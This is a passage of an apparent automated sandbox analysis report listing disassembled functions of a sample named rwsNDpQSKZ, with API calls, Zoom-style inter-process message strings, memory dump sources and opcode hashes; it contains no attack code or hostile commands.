                  • Part of subcall function 00C87CBE: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information), ref: 00C87E01
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@TreeV12@@
                • String ID: CurUserJson$JsCallID$com.zoom.app.cci.ccivideo.getcurrentuser.response
                • API String ID: 9112088-2696971557
                • Opcode ID: b035dd377c78626aeb510bc51ada7cd1120d2d277e6479640b62fa7e7088484e
                • Instruction ID: aacbd27389af5bb4818e8b954ab7720d122435ce0710205128f02eaac1ef3486
                • Opcode Fuzzy Hash: b035dd377c78626aeb510bc51ada7cd1120d2d277e6479640b62fa7e7088484e
                • Instruction Fuzzy Hash: 8AE092B0B003847BD710AB84A846B3E66A4FB80B5AF604A18B3405B3E1CBF44D48C7B5
                Function 00C763A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C763A7
                • ??0?$CmmMessageTemplate_2@HV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.pmc.open.teamchat.rsp,000027AA,openResult,sessionId,00000004), ref: 00C763C7
                  • Part of subcall function 00C87690: __EH_prolog3.LIBCMT ref: 00C87697
                  • Part of subcall function 00C87690: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C875D2,?,?,?,?,00000004,00C874D5,?,?,?,?,?), ref: 00C876AA
                  • Part of subcall function 00C93584: __EH_prolog3_GS.LIBCMT ref: 00C9358B
                  • Part of subcall function 00C93584: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935B1
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935DF
                  • Part of subcall function 00C93584: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9361C
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9364C
                  • Part of subcall function 00C93584: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify), ref: 00C936AA
                  • Part of subcall function 00C93584: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor), ref: 00C936C7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.Zoom.app.conf.pmc.open.teamchat.rsp$openResult$sessionId
                • API String ID: 2715420528-2150493469
                • Opcode ID: a5bd0121ce6e2b5906f47dee9129f6119187bfda4d4d1b92593d6d4b8245d517
                • Instruction ID: e9b2ba185bf742889ec483111eb71d1cdf54f1108ebfd66ec68d4c0b84b07f57
                • Opcode Fuzzy Hash: a5bd0121ce6e2b5906f47dee9129f6119187bfda4d4d1b92593d6d4b8245d517
                • Instruction Fuzzy Hash: A8E092F0A44A94ABD710BB48DC5AB2A72B4EB50B1AF40043CB2049E3E1CBF54D08C7B2
                Function 00C74360 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74367
                • ??0?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.voice.command.data.response,00009D32,type,jsonString,00000004), ref: 00C74387
                  • Part of subcall function 00C8AEE0: __EH_prolog3.LIBCMT ref: 00C8AEE7
                  • Part of subcall function 00C8AEE0: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C8AE42,?,?,?,?,00000004,00C6B83F,com.Zoom.app.notify.videolayout.download.status,00002775,status,message,data), ref: 00C8AEFA
                  • Part of subcall function 00C93584: __EH_prolog3_GS.LIBCMT ref: 00C9358B
                  • Part of subcall function 00C93584: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935B1
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935DF
                  • Part of subcall function 00C93584: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9361C
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9364C
                  • Part of subcall function 00C93584: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify), ref: 00C936AA
                  • Part of subcall function 00C93584: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor), ref: 00C936C7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.assistant.voice.command.data.response$jsonString$type
                • API String ID: 2715420528-507074639
                • Opcode ID: f17986ff5ff166520ce3aecff3224ad3a684684d9ef867abe8f5a2eef1b230a4
                • Instruction ID: 854a86c763160ec7c4b9d7e47c418b81b056769f8cf7ee802d428318c2749100
                • Opcode Fuzzy Hash: f17986ff5ff166520ce3aecff3224ad3a684684d9ef867abe8f5a2eef1b230a4
                • Instruction Fuzzy Hash: 3EE092B0A40785FBDB10AB458D46B6E62A4DB50B59F548419F1005B3D2CBF50D04EB76
                Function 00C74300 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74307
                • ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.voice.command.data.request,00009D31,type,param1,00000004), ref: 00C74327
                  • Part of subcall function 00C8A460: __EH_prolog3.LIBCMT ref: 00C8A467
                  • Part of subcall function 00C8A460: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6B29C,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A47A
                  • Part of subcall function 00C8A50D: __EH_prolog3_GS.LIBCMT ref: 00C8A514
                  • Part of subcall function 00C8A50D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A53A
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A568
                  • Part of subcall function 00C8A50D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5A5
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5D5
                  • Part of subcall function 00C8A50D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download), ref: 00C8A633
                  • Part of subcall function 00C8A50D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index), ref: 00C8A650
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.assistant.voice.command.data.request$param1$type
                • API String ID: 3124793654-4143552153
                • Opcode ID: 12eb8f1181547d620cafc91cad384423010cadf438fc43b4dc54e20ea72cecff
                • Instruction ID: 284ecd1d49f1222fdf0e69a59b73d5ba27ceee8e976f619bdc14ed52d13ae52e
                • Opcode Fuzzy Hash: 12eb8f1181547d620cafc91cad384423010cadf438fc43b4dc54e20ea72cecff
                • Instruction Fuzzy Hash: 63E022B1A00749FBEB107B408C86B2A71A4AB80B09F504929F1104B392CBF00D44C771
                Function 00C724A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C724A7
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.getuserlist.response,00009E82,JsCallID,UsersJson,00000004), ref: 00C724C7
                  • Part of subcall function 00C85590: __EH_prolog3.LIBCMT ref: 00C85597
                  • Part of subcall function 00C85590: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85482,?,?,?,?,00000004,00C85365,?,?,?,?,?), ref: 00C855AA
                  • Part of subcall function 00C87CBE: __EH_prolog3_GS.LIBCMT ref: 00C87CC5
                  • Part of subcall function 00C87CBE: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87CEB
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D19
                  • Part of subcall function 00C87CBE: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D56
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D86
                  • Part of subcall function 00C87CBE: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive), ref: 00C87DE4
                  • Part of subcall function 00C87CBE: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information), ref: 00C87E01
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@TreeV12@@
                • String ID: JsCallID$UsersJson$com.zoom.app.cci.ccivideo.getuserlist.response
                • API String ID: 9112088-3602429407
                • Opcode ID: 9827253881441dc8e9080045e3aff798af71f5529e84af204d239d930d94f4b0
                • Instruction ID: ac56db50772bb033d9418886f1c0d2b58e4d6b6b08f1702943082cfcc5f5aa52
                • Opcode Fuzzy Hash: 9827253881441dc8e9080045e3aff798af71f5529e84af204d239d930d94f4b0
                • Instruction Fuzzy Hash: 10E092B4B00384BBE7206B849C46B2E3664AB84F59F90451CF3185B3D1CBF54D44D775
                Function 00C68450 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68457
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.stop,00002719,ProcessID,ProcessName,00000004), ref: 00C68477
                  • Part of subcall function 00C85B10: __EH_prolog3.LIBCMT ref: 00C85B17
                  • Part of subcall function 00C85B10: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85A32,?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand), ref: 00C85B2A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: ProcessID$ProcessName$com.Zoom.app.conf.stop
                • API String ID: 2715420528-2522990614
                • Opcode ID: 347a96af648f36256849783a646f675d6a5f467139670a1a850d17da8caa3336
                • Instruction ID: 1397869d326db741d2664d2b4b86fd25cf416e3917ef7d453e0bfb5d72cdcb69
                • Opcode Fuzzy Hash: 347a96af648f36256849783a646f675d6a5f467139670a1a850d17da8caa3336
                • Instruction Fuzzy Hash: 43E092B4A44755ABE7206B455C95B7E6364EB90B1AF940528F2406A3C2CBF40C84D7B8
                Function 00C76460 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76467
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.pmc.meeting.ended,000027AD,myAccountId,groupId,00000004), ref: 00C76487
                  • Part of subcall function 00C85590: __EH_prolog3.LIBCMT ref: 00C85597
                  • Part of subcall function 00C85590: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85482,?,?,?,?,00000004,00C85365,?,?,?,?,?), ref: 00C855AA
                  • Part of subcall function 00C87CBE: __EH_prolog3_GS.LIBCMT ref: 00C87CC5
                  • Part of subcall function 00C87CBE: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87CEB
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D19
                  • Part of subcall function 00C87CBE: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D56
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D86
                  • Part of subcall function 00C87CBE: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive), ref: 00C87DE4
                  • Part of subcall function 00C87CBE: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information), ref: 00C87E01
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@TreeV12@@
                • String ID: com.Zoom.app.conf.pmc.meeting.ended$groupId$myAccountId
                • API String ID: 9112088-2720630376
                • Opcode ID: eaf872006cb7fb31f7dc7147c9c3007eca2fe84d64af6d877e4e103343329b81
                • Instruction ID: 714fd8482c3c50959e6b75f76a5555c64fd3071d63e13feaca7994887aa04a94
                • Opcode Fuzzy Hash: eaf872006cb7fb31f7dc7147c9c3007eca2fe84d64af6d877e4e103343329b81
